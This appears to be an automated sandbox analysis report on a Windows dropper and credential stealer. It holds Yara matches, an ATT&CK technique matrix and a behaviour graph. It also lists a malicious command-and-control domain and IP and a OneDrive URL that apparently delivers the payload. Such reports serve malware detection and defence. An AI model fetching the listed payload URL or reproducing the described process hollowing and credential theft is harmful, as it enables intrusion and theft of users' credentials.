              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: srcngmlC.pif PID: 5660, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: srcngmlC.pif PID: 6348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: srcngmlC.pif PID: 6164, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: srcngmlC.pif PID: 5660, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: srcngmlC.pif PID: 6348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: srcngmlC.pif PID: 6164, type: MEMORYSTR
              Source: Yara matchFile source: 8.2.srcngmlC.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.1.srcngmlC.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.1.srcngmlC.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1851440244.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1851440244.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2903058685.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000001.1903364195.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000001.1683699497.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2903058685.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1918672427.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1705935072.000000007EA90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000001.1903364195.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000001.1833365375.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1918672427.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1683696452.000000007EA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000001.1683699497.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000001.1833365375.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              1
              Valid Accounts
              121
              Windows Management Instrumentation
              1
              Scripting
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services11
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Native API
              1
              DLL Side-Loading
              1
              Valid Accounts
              11
              Deobfuscate/Decode Files or Information
              211
              Input Capture
              1
              System Network Connections Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Shared Modules
              1
              Valid Accounts
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              1
              Credentials in Registry
              2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Screen Capture
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Command and Scripting Interpreter
              1
              Windows Service
              1
              Windows Service
              3
              Software Packing
              NTDS47
              System Information Discovery
              Distributed Component Object Model1
              Email Collection
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd1
              Registry Run Keys / Startup Folder
              311
              Process Injection
              1
              Timestomp
              LSA Secrets1
              Query Registry
              SSH211
              Input Capture
              23
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              Cached Domain Credentials261
              Security Software Discovery
              VNC1
              Clipboard Data
              Multiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
              Masquerading
              DCSync131
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Valid Accounts
              Proc Filesystem2
              Process Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadow11
              Application Window Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron131
              Virtualization/Sandbox Evasion
              Network Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1380665 Sample: SecuriteInfo.com.Win32.Drop... Startdate: 24/01/2024 Architecture: WINDOWS Score: 100 42 mail.oripam.xyz 2->42 44 oripam.xyz 2->44 46 8 other IPs or domains 2->46 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 62 9 other signatures 2->62 9 SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe 1 9 2->9         started        14 Clmgncrs.PIF 2->14         started        16 Clmgncrs.PIF 2->16         started        signatures3 60 Performs DNS queries to domains with low reputation 42->60 process4 dnsIp5 52 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49729, 49730 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 9->52 34 C:\Users\Public\Libraries\truesight.sys, PE32+ 9->34 dropped 36 C:\Users\Public\Libraries\srcngmlC.pif, PE32 9->36 dropped 38 C:\Users\Public\Libraries\netutils.dll, PE32+ 9->38 dropped 40 2 other malicious files 9->40 dropped 78 Drops PE files with a suspicious file extension 9->78 80 Writes to foreign memory regions 9->80 82 Allocates memory in foreign processes 9->82 84 Sample is not signed and drops a device driver 9->84 18 srcngmlC.pif 15 2 9->18         started        22 cmd.exe 1 9->22         started        86 Multi AV Scanner detection for dropped file 14->86 88 Machine Learning detection for dropped file 14->88 90 Sample uses process hollowing technique 14->90 24 srcngmlC.pif 2 14->24         started        26 srcngmlC.pif 16->26         started        file6 signatures7 process8 dnsIp9 48 oripam.xyz 185.56.136.50, 49733, 49734, 49735 SECUREDSERVERS-EU Malta 18->48 50 api4.ipify.org 173.231.16.75, 443, 49732, 49744 WEBNXUS United States 18->50 64 Detected unpacking (changes PE section rights) 18->64 66 Detected unpacking (overwrites its own PE header) 18->66 68 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->68 70 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->70 28 cmd.exe 2 22->28         started        30 conhost.exe 22->30         started        72 Tries to steal Mail credentials (via file / registry access) 26->72 74 Tries to harvest and steal browser information (history, passwords, etc) 26->74 76 Installs a global keyboard hook 26->76 signatures10 process11 process12 32 conhost.exe 28->32         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe53%ReversingLabsWin32.Trojan.Ulise
              SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\netutils.dll100%Joe Sandbox ML
              C:\Users\Public\Libraries\Clmgncrs.PIF100%Joe Sandbox ML
              C:\Users\Public\Libraries\Clmgncrs.PIF53%ReversingLabsWin32.Trojan.Ulise
              C:\Users\Public\Libraries\easinvoker.exe0%ReversingLabs
              C:\Users\Public\Libraries\netutils.dll71%ReversingLabsWin64.Trojan.Generic
              C:\Users\Public\Libraries\srcngmlC.pif3%ReversingLabs
              C:\Users\Public\Libraries\truesight.sys8%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              http://r3.o.lencr.org00%URL Reputationsafe
              http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
              http://oripam.xyz100%Avira URL Cloudmalware
              http://mail.oripam.xyz100%Avira URL Cloudmalware
              http://r3.i.lencr.org/0G0%Avira URL Cloudsafe
              http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
              http://www.pmail.com00%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              dual-spov-0006.spov-msedge.net
              13.107.139.11
              truefalse
                unknown
                oripam.xyz
                185.56.136.50
                truetrue
                  unknown
                  api4.ipify.org
                  173.231.16.75
                  truefalse
                    high
                    onedrive.live.com
                    unknown
                    unknownfalse
                      high
                      mail.oripam.xyz
                      unknown
                      unknowntrue
                        unknown
                        api.ipify.org
                        unknown
                        unknownfalse
                          high
                          ypfgrg.sn.files.1drv.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              high
                              https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BEfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://ypfgrg.sn.files.1drv.com:443/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://ypfgrg.sn.files.1drv.com/SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000764000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682330208.0000000000765000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://sectigo.com/CPS0SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ypfgrg.sn.files.1drv.com/hClmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://account.dyn.com/srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21304&authkey=Clmgncrs.PIF, 00000009.00000002.1906761874.0000000002950000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
